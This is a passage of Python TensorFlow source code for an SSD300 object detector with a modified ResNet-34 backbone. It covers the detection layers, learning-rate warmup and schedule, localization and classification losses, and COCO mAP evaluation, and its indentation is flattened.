# Input 300x300, output 150x150
cnn.conv(64, 7, 7, 2, 2, mode='SAME_RESNET', use_batch_norm=True)
cnn.mpool(3, 3, 2, 2, mode='SAME')
resnet34_layers = [3, 4, 6, 3]
version = 'v1'
# ResNet-34 block group 1
# Input 150x150, output 75x75
for i in range(resnet34_layers[0]):
# Last argument forces residual_block to use projection shortcut, even
# though the numbers of input and output channels are equal
resnet_model.residual_block(cnn, 64, 1, version)
# ResNet-34 block group 2
# Input 75x75, output 38x38
for i in range(resnet34_layers[1]):
stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 128, stride, version, i == 0)
# ResNet-34 block group 3
# This block group is modified: first layer uses stride=1 so that the image
# size does not change in group of layers
# Input 38x38, output 38x38
for i in range(resnet34_layers[2]):
# The following line is intentionally commented out to differentiate from
# the original ResNet-34 model
# stride = 2 if i == 0 else 1
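# stride still holds 1 here (its value from the last iteration of the block
# group 2 loop), so the 38x38 feature map size is preserved in this group.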
resnet_model.residual_block(cnn, 256, stride, version, i == 0)
# ResNet-34 block group 4: removed final block group
# The following 3 lines are intentionally commented out to differentiate
# from the original ResNet-34 model
# for i in range(resnet34_layers[3]):
# stride = 2 if i == 0 else 1
# resnet_model.residual_block(cnn, 512, stride, version, i == 0)
def add_inference(self, cnn):
cnn.use_batch_norm = True
cnn.batch_norm_config = {'decay': ssd_constants.BATCH_NORM_DECAY,
'epsilon': ssd_constants.BATCH_NORM_EPSILON,
'scale': True}
with tf.variable_scope(BACKBONE_MODEL_SCOPE_NAME):
self.add_backbone_model(cnn)
# --------------------------------------------------------------------------
# SSD additional layers
# --------------------------------------------------------------------------
def add_ssd_layer(cnn, depth, k_size, stride, mode):
return cnn.conv(
depth,
k_size,
k_size,
stride,
stride,
mode=mode,
use_batch_norm=False,
kernel_initializer=contrib_layers.xavier_initializer())
# Activations for feature maps of different layers
self.activations = [cnn.top_layer]
# Conv7_1, Conv7_2
# Input 38x38, output 19x19
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv8_1, Conv8_2
# Input 19x19, output 10x10
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv9_1, Conv9_2
# Input 10x10, output 5x5
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 2, 'same'))
# Conv10_1, Conv10_2
# Input 5x5, output 3x3
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
# Conv11_1, Conv11_2
# Input 3x3, output 1x1
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
self.loc = []
self.conf = []
for nd, ac, oc in zip(self.num_dboxes, self.activations, self.out_chan):
l = cnn.conv(
nd * 4,
3,
3,
1,
1,
input_layer=ac,
num_channels_in=oc,
activation=None,
use_batch_norm=False,
kernel_initializer=contrib_layers.xavier_initializer())
scale = l.get_shape()[-1]
# shape = [batch_size, nd * 4, scale, scale]
l = tf.reshape(l, [self.batch_size, nd, 4, scale, scale])
# shape = [batch_size, nd, 4, scale, scale]
l = tf.transpose(l, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, 4]
self.loc.append(tf.reshape(l, [self.batch_size, -1, 4]))
# shape = [batch_size, nd * scale * scale, 4]
c = cnn.conv(
nd * self.label_num,
3,
3,
1,
1,
input_layer=ac,
num_channels_in=oc,
activation=None,
use_batch_norm=False,
kernel_initializer=contrib_layers.xavier_initializer())
# shape = [batch_size, nd * label_num, scale, scale]
c = tf.reshape(c, [self.batch_size, nd, self.label_num, scale, scale])
# shape = [batch_size, nd, label_num, scale, scale]
c = tf.transpose(c, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, label_num]
self.conf.append(tf.reshape(c, [self.batch_size, -1, self.label_num]))
# shape = [batch_size, nd * scale * scale, label_num]
# Shape of locs: [batch_size, NUM_SSD_BOXES, 4]
# Shape of confs: [batch_size, NUM_SSD_BOXES, label_num]
locs, confs = tf.concat(self.loc, 1), tf.concat(self.conf, 1)
# Pack location and confidence outputs into a single output layer
# Shape of logits: [batch_size, NUM_SSD_BOXES, 4+label_num]
logits = tf.concat([locs, confs], 2)
cnn.top_layer = logits
cnn.top_size = 4 + self.label_num
return cnn.top_layer
def get_learning_rate(self, global_step, batch_size):
rescaled_lr = self.get_scaled_base_learning_rate(batch_size)
# Defined in MLPerf reference model
boundaries = [160000, 200000]
boundaries = [b * self.base_lr_batch_size // batch_size for b in boundaries]
decays = [1, 0.1, 0.01]
learning_rates = [rescaled_lr * d for d in decays]
lr = tf.train.piecewise_constant(global_step, boundaries, learning_rates)
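# Linear warmup over roughly 5 epochs: 118287 is the number of images in the
# COCO training split, so warmup_steps corresponds to 5 passes over the data.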
warmup_steps = int(118287 / batch_size * 5)
warmup_lr = (
rescaled_lr * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
return tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: lr)
def get_scaled_base_learning_rate(self, batch_size):
"""Calculates base learning rate for creating lr schedule.
In replicated mode, gradients are summed rather than averaged which, with
the sgd and momentum optimizers, increases the effective learning rate by
lr * num_gpus. Dividing the base lr by num_gpus negates the increase.
Args:
batch_size: Total batch-size.
Returns:
Base learning rate to use to create lr schedule.
"""
base_lr = self.learning_rate
if self.params.variable_update == 'replicated':
base_lr = self.learning_rate / self.params.num_gpus
scaled_lr = base_lr * (batch_size / self.base_lr_batch_size)
return scaled_lr
def _collect_backbone_vars(self):
backbone_vars = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope='.*'+ BACKBONE_MODEL_SCOPE_NAME)
var_list = {}
# Assume variables in the checkpoint are following the naming convention of
# a model checkpoint trained with TF official model
# TODO(haoyuzhang): the following variable name parsing is hacky and easy
# to break if there is change in naming convention of either benchmarks or
# official models.
for v in backbone_vars:
# conv2d variable example (model <-- checkpoint):
# v/cg/conv24/conv2d/kernel:0 <-- conv2d_24/kernel
if 'conv2d' in v.name:
re_match = re.search(r'conv(\d+)/conv2d/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'conv2d', layer_id, param_name)
var_list[vname_in_ckpt] = v
# batchnorm variable example:
# v/cg/conv24/batchnorm25/gamma:0 <-- batch_normalization_25/gamma
elif 'batchnorm' in v.name:
re_match = re.search(r'batchnorm(\d+)/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'batch_normalization', layer_id, param_name)
var_list[vname_in_ckpt] = v
return var_list
def _var_name_in_official_model_ckpt(self, layer_name, layer_id, param_name):
"""Return variable names according to convention in TF official models."""
vname_in_ckpt = layer_name
if layer_id > 0:
vname_in_ckpt += '_' + str(layer_id)
vname_in_ckpt += '/' + param_name
return vname_in_ckpt
def loss_function(self, inputs, build_network_result):
logits = build_network_result.logits
# Unpack model output back to locations and confidence scores of predictions
# Shape of pred_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of pred_label: [batch_size, NUM_SSD_BOXES, label_num]
pred_loc, pred_label = tf.split(logits, [4, self.label_num], 2)
# Shape of gt_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of gt_label: [batch_size, NUM_SSD_BOXES, 1]
# Shape of num_gt: [batch_size]
_, gt_loc, gt_label, num_gt = inputs
gt_label = tf.cast(gt_label, tf.int32)
box_loss = self._localization_loss(pred_loc, gt_loc, gt_label, num_gt)
class_loss = self._classification_loss(pred_label, gt_label, num_gt)
tf.summary.scalar('box_loss', tf.reduce_mean(box_loss))
tf.summary.scalar('class_loss', tf.reduce_mean(class_loss))
return class_loss + box_loss
def _localization_loss(self, pred_loc, gt_loc, gt_label, num_matched_boxes):
"""Computes the localization loss.
Computes the localization loss using smooth l1 loss.
Args:
pred_loc: a flattened tensor that includes all predicted locations. The
shape is [batch_size, num_anchors, 4].
gt_loc: a tensor representing box regression targets in
[batch_size, num_anchors, 4].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
targets, used as the loss normalizer. The shape is [batch_size].
Returns:
box_loss: a float32 representing total box regression loss.
"""
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
smooth_l1 = tf.reduce_sum(tf.losses.huber_loss(
gt_loc, pred_loc,
reduction=tf.losses.Reduction.NONE
), axis=2)
smooth_l1 = tf.multiply(smooth_l1, float_mask)
box_loss = tf.reduce_sum(smooth_l1, axis=1)
return tf.reduce_mean(box_loss / num_matched_boxes)
def _classification_loss(self, pred_label, gt_label, num_matched_boxes):
"""Computes the classification loss.
Computes the classification loss with hard negative mining.
Args:
pred_label: a flattened tensor that includes all predicted classes. The shape
is [batch_size, num_anchors, num_classes].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
targets. This is used as the loss normalizer.
Returns:
class_loss: a float32 representing total classification loss.
"""
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
gt_label, pred_label, reduction=tf.losses.Reduction.NONE)
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
# Hard example mining
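# The double argsort yields, for each box, the rank of its negatives-only
# cross entropy in descending order; keeping ranks below num_neg_boxes selects
# the hardest negatives at a fixed ratio (NEGS_PER_POSITIVE) to the number of
# matched positives.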
neg_masked_cross_entropy = cross_entropy * (1 - float_mask)
relative_position = tf.argsort(
tf.argsort(
neg_masked_cross_entropy, direction='DESCENDING'))
num_neg_boxes = tf.minimum(
tf.to_int32(num_matched_boxes) * ssd_constants.NEGS_PER_POSITIVE,
ssd_constants.NUM_SSD_BOXES)
top_k_neg_mask = tf.cast(tf.less(
relative_position,
tf.tile(num_neg_boxes[:, tf.newaxis], (1, ssd_constants.NUM_SSD_BOXES))
), tf.float32)
class_loss = tf.reduce_sum(
tf.multiply(cross_entropy, float_mask + top_k_neg_mask), axis=1)
return tf.reduce_mean(class_loss / num_matched_boxes)
def add_backbone_saver(self):
# Create saver with mapping from variable names in checkpoint of backbone
# model to variables in SSD model
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
for saver in self.backbone_savers:
saver.restore(sess, backbone_model_path)
def get_input_data_types(self, subset):
if subset == 'validation':
return [self.data_type, tf.float32, tf.float32, tf.float32, tf.int32]
return [self.data_type, tf.float32, tf.float32, tf.float32]
def get_input_shapes(self, subset):
"""Return encoded tensor shapes for train and eval data respectively."""
if subset == 'validation':
# Validation data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. source image IDs
# 5. raw image shapes
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 4],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 1],
[self.batch_size],
[self.batch_size, 3],
]
# Training data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. numbers of objects in images
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1],
[self.batch_size]
]
def accuracy_function(self, inputs, logits):
"""Returns the ops to measure the mean precision of the model."""
try:
import ssd_dataloader # pylint: disable=g-import-not-at-top
from object_detection.box_coders import faster_rcnn_box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_list # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
                        '#protobuf-compilation ; To evaluate using the COCO '
                        'metric, download and install the Python COCO API from '
'https://github.com/cocodataset/cocoapi')
# Unpack model output back to locations and confidence scores of predictions
# pred_locs: relative locations (coordinates) of objects in all SSD boxes
# shape: [batch_size, NUM_SSD_BOXES, 4]
# pred_labels: confidence scores of objects being of all categories
# shape: [batch_size, NUM_SSD_BOXES, label_num]
pred_locs, pred_labels = tf.split(logits, [4, self.label_num], 2)
ssd_box_coder = faster_rcnn_box_coder.FasterRcnnBoxCoder(
scale_factors=ssd_constants.BOX_CODER_SCALES)
anchors = box_list.BoxList(
tf.convert_to_tensor(ssd_dataloader.DefaultBoxes()('ltrb')))
pred_boxes = box_coder.batch_decode(
encoded_boxes=pred_locs, box_coder=ssd_box_coder, anchors=anchors)
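    # batch_decode converts the predicted offsets back into absolute box
    # coordinates, using the SSD default boxes as anchors and the configured
    # box-coder scale factors.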
pred_scores = tf.nn.softmax(pred_labels, axis=2)
# TODO(haoyuzhang): maybe use `gt_boxes` and `gt_classes` for visualization.
_, gt_boxes, gt_classes, source_id, raw_shape = inputs # pylint: disable=unused-variable
return {
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_BOXES): pred_boxes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_SCORES): pred_scores,
# TODO(haoyuzhang): maybe use these values for visualization.
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_boxes': gt_boxes,
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_classes': gt_classes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.SOURCE_ID): source_id,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.RAW_SHAPE): raw_shape
}
def postprocess(self, results):
"""Postprocess results returned from model."""
try:
import coco_metric # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
                        '#protobuf-compilation ; To evaluate using the COCO '
                        'metric, download and install the Python COCO API from '
'https://github.com/cocodataset/cocoapi')
pred_boxes = results[ssd_constants.PRED_BOXES]
pred_scores = results[ssd_constants.PRED_SCORES]
# TODO(haoyuzhang): maybe use these values for visualization.
# gt_boxes = results['gt_boxes']
# gt_classes = results['gt_classes']
source_id = results[ssd_constants.SOURCE_ID]
raw_shape = results[ssd_constants.RAW_SHAPE]
    # COCO evaluation requires processing COCO_NUM_VAL_IMAGES exactly once.
    # Because COCO_NUM_VAL_IMAGES is usually not divisible by the batch size,
    # setting `num_eval_epochs` to 1 is not enough and will often miss some
    # images. We expect the user to set `num_eval_epochs` to >1, which will
    # leave some unused images from previous steps in `predictions`. Here we
    # check whether we are doing eval at a new global step.
if results['global_step'] > self.eval_global_step:
self.eval_global_step = results['global_step']
self.predictions.clear()
for i, sid in enumerate(source_id):
self.predictions[int(sid)] = {
ssd_constants.PRED_BOXES: pred_boxes[i],
ssd_constants.PRED_SCORES: pred_scores[i],
ssd_constants.SOURCE_ID: source_id[i],
ssd_constants.RAW_SHAPE: raw_shape[i]
}
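    # Predictions are keyed by source image id, so images repeated across eval
    # epochs overwrite their earlier entries instead of being double counted.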
    # The COCO metric calculates mAP only after a full epoch of evaluation.
    # Return dummy results for top_N_accuracy to be compatible with
    # benchmark_cnn.py.
if len(self.predictions) >= ssd_constants.COCO_NUM_VAL_IMAGES:
log_fn('Got results for all {:d} eval examples. Calculate mAP...'.format(
ssd_constants.COCO_NUM_VAL_IMAGES))
annotation_file = os.path.join(self.params.data_dir,
ssd_constants.ANNOTATION_FILE)
      # The size of predictions before decoding is about 15--30GB, while the
      # size after decoding is 100--200MB. When using async eval mode, decoding
      # takes 20--30 seconds of main thread time but is necessary to avoid OOM
      # during inter-process communication.
decoded_preds = coco_metric.decode_predictions(self.predictions.values())
self.predictions.clear()
if self.params.collect_eval_results_async:
def _eval_results_getter():
"""Iteratively get eval results from async eval process."""
while True:
step, eval_results = self.async_eval_results_queue.get()
self.eval_coco_ap = eval_results['COCO/AP']
mlperf.logger.log_eval_accuracy(
self.eval_coco_ap, step, self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
if self.reached_target():
# Reached target, clear all pending messages in predictions queue
# and insert poison pill to stop the async eval process.
while not self.async_eval_predictions_queue.empty():
self.async_eval_predictions_queue.get()
self.async_eval_predictions_queue.put('STOP')
break
if not self.async_eval_process:
        # Limit the number of messages in the predictions queue to prevent
        # OOM. Each message (predictions data) can potentially consume a lot
        # of memory, and normally there should only be a few messages in the
        # queue. If the main thread is often blocked here, consider reducing
        # the eval frequency.
self.async_eval_predictions_queue = multiprocessing.Queue(2)
self.async_eval_results_queue = multiprocessing.Queue()
        # We use a Process rather than a Thread mainly because the eval runner
        # is computationally intensive. Python threads do not truly run in
        # parallel, so a runner thread would either be significantly delayed
        # or delay the main thread.
self.async_eval_process = multiprocessing.Process(
target=coco_metric.async_eval_runner,
args=(self.async_eval_predictions_queue,
self.async_eval_results_queue,
annotation_file))
self.async_eval_process.daemon = True
self.async_eval_process.start()
self.async_eval_results_getter_thread = threading.Thread(
target=_eval_results_getter, args=())
self.async_eval_results_getter_thread.daemon = True
self.async_eval_results_getter_thread.start()
self.async_eval_predictions_queue.put(
(self.eval_global_step, decoded_preds))
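        # Async eval is still in flight; return placeholder accuracies until
        # the getter thread above records the COCO AP.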
return {'top_1_accuracy': 0, 'top_5_accuracy': 0.}
eval_results = coco_metric.compute_map(decoded_preds, annotation_file)
self.eval_coco_ap = eval_results['COCO/AP']
ret = {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
for metric_key, metric_value in eval_results.items():
ret[constants.SIMPLE_VALUE_RESULT_PREFIX + metric_key] = metric_value
mlperf.logger.log_eval_accuracy(self.eval_coco_ap, self.eval_global_step,
self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
return ret
log_fn('Got {:d} out of {:d} eval examples.'
' Waiting for the remaining to calculate mAP...'.format(
len(self.predictions), ssd_constants.COCO_NUM_VAL_IMAGES))
return {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
def get_synthetic_inputs(self, input_name, nclass):
"""Generating synthetic data matching real data shape and type."""
inputs = tf.random_uniform(
self.get_input_shapes('train')[0], dtype=self.data_type)
inputs = variables.VariableV1(inputs, trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name=input_name)
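    # Holding the random images in a non-trainable local variable means they
    # are generated once at initialization rather than re-sampled every step.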
boxes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4], dtype=tf.float32)
classes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1], dtype=tf.float32)
nboxes = tf.random_uniform(
[self.batch_size], minval=1, maxval=10, dtype=tf.float32)
return (inputs, boxes, classes, nboxes)
def reached_target(self):
return (self.params.stop_at_top_1_accuracy and
self.eval_coco_ap >= self.params.stop_at_top_1_accuracy)